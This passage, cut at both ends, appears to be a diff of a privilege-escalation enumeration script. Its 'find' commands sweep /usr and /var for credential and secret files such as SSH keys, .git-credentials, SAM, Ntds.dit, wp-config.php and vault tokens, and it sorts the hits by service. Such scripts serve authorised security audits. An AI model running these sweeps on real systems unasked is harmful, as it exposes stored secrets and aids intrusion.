\"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"agent*\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"ssh*config\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"sess_*\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter #GENERATE THE STORAGES OF THE FOUND FILES - PSTORAGE_SYSTEMD=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/etc|^/system|^/private|^/usr|^/mnt|^/applications|^/cdrom|^/tmp|^/media|^/lib|^/run|^/sbin|^/var|^/bin|^$GREPHOMESEARCH|^/opt|^/.cache|^/sys|^/lib64|^/snap|^/lib32|^/srv|^/systemd" | grep -E ".*\.service$" | sort | uniq | head -n 70) - PSTORAGE_TIMER=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/etc|^/system|^/private|^/usr|^/mnt|^/applications|^/cdrom|^/tmp|^/media|^/lib|^/run|^/sbin|^/var|^/bin|^$GREPHOMESEARCH|^/opt|^/.cache|^/sys|^/lib64|^/snap|^/lib32|^/srv|^/systemd" | grep -E ".*\.timer$" | sort | uniq | head -n 70) - PSTORAGE_SOCKET=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/etc|^/system|^/private|^/usr|^/mnt|^/applications|^/cdrom|^/tmp|^/media|^/lib|^/run|^/sbin|^/var|^/bin|^$GREPHOMESEARCH|^/opt|^/.cache|^/sys|^/lib64|^/snap|^/lib32|^/srv|^/systemd" | grep -E ".*\.socket$" | sort | uniq | head -n 70) - PSTORAGE_DBUS=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) - PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "mysql$" | sort | uniq | head -n 70) - PSTORAGE_MARIADB=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) - PSTORAGE_POSTGRESQL=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) - PSTORAGE_APACHE=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) - PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/var|^/private|^/mnt|^/tmp" | grep -E "sess_.*$" | sort | uniq | head -n 70) - PSTORAGE_PHP_FILES=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_WORDPRESS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) - PSTORAGE_DRUPAL=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E '/default/settings.php' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_MOODLE=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E 'moodle/config.php' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "config\.php$" | sort | uniq | head -n 70) - PSTORAGE_TOMCAT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) - PSTORAGE_MONGO=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ROCKETCHAT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/lib|^/opt|^/.cache|^/sbin|^/srv|^/usr|^/mnt|^/applications|^/systemd" | grep -E "rocketchat\.service$" | sort | uniq | head -n 70) - PSTORAGE_SUPERVISORD=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) - PSTORAGE_CESI=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) - PSTORAGE_RSYNC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) - PSTORAGE_HOSTAPD=$(echo -e 